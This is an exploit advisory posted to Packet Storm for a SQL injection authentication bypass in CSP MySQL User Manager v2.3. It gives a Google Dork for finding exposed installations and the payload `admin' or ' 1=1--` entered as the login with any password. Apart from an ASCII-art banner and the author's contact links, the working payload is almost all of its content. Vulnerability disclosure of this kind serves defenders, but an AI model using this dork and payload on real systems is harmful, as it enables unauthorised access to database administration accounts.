Youssef mamiPACKETSTORM:124724
`# Exploit Title: CSP MySQL User Manager v2.3 SQL Injection
Authentication Bypass
# Google Dork: intitle:"CSP MySQL User Manager"
# Date: 8/1/2013
# Exploit Author: Youssef mami
# Vendor Homepage: https://code.google.com/p/cspmum/
# Software Link:
https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
# Version: 2.3
# Tested on: Linux 2.6.38-11
# CVE : nothing
##################################################################################
.__ __
| |__ _____ _____ _____ _____ _____ _____/ |_
| | \\__ \ / \ / \\__ \ / \_/ __ \ __\
| Y \/ __ \| Y Y \ Y Y \/ __ \| Y Y \ ___/| |
|___| (____ /__|_| /__|_| (____ /__|_| /\___ >__|
\/ \/ \/ \/ \/ \/ \/
.__ _____ __ .__
|__| _____/ ____\___________ _____ _____ _/ |_|__| ________ __ ____
| |/ \ __\/ _ \_ __ \/ \\__ \\ __\ |/ ____/ | \_/ __ \
| | | \ | ( <_> ) | \/ Y Y \/ __ \| | | < <_| | | /\ ___/
|__|___| /__| \____/|__| |__|_| (____ /__| |__|\__ |____/ \___
>
\/ \/ \/ |__| \/
.__
______ ______________ _|__| ____ ____ ______
/ ___// __ \_ __ \ \/ / |/ ___\/ __ \ / ___/
\___ \\ ___/| | \/\ /| \ \__\ ___/ \___ \
/____ >\___ >__| \_/ |__|\___ >___ >____ >
\/ \/ \/ \/ \/
##################################################################################
SQL Injection Authentication Bypass
Product Page:
https://code.google.com/p/cspmum/downloads/detail?name=cmum-23.zip&can=2&q=
Author(Pentester): Youssef mami ([email protected])
On Web: www.hammamet-services.com and http://hiservices.blogspot.com (
our blog )
On Social: www.facebook.com/hammamet.informatique and
https://twitter.com/hammamet_info
##################################################################################
we just need to input admin login like this : admin' or ' 1=1-- and any
password :-)
login : admin' or ' 1=1--
password: hammamet informatique services
`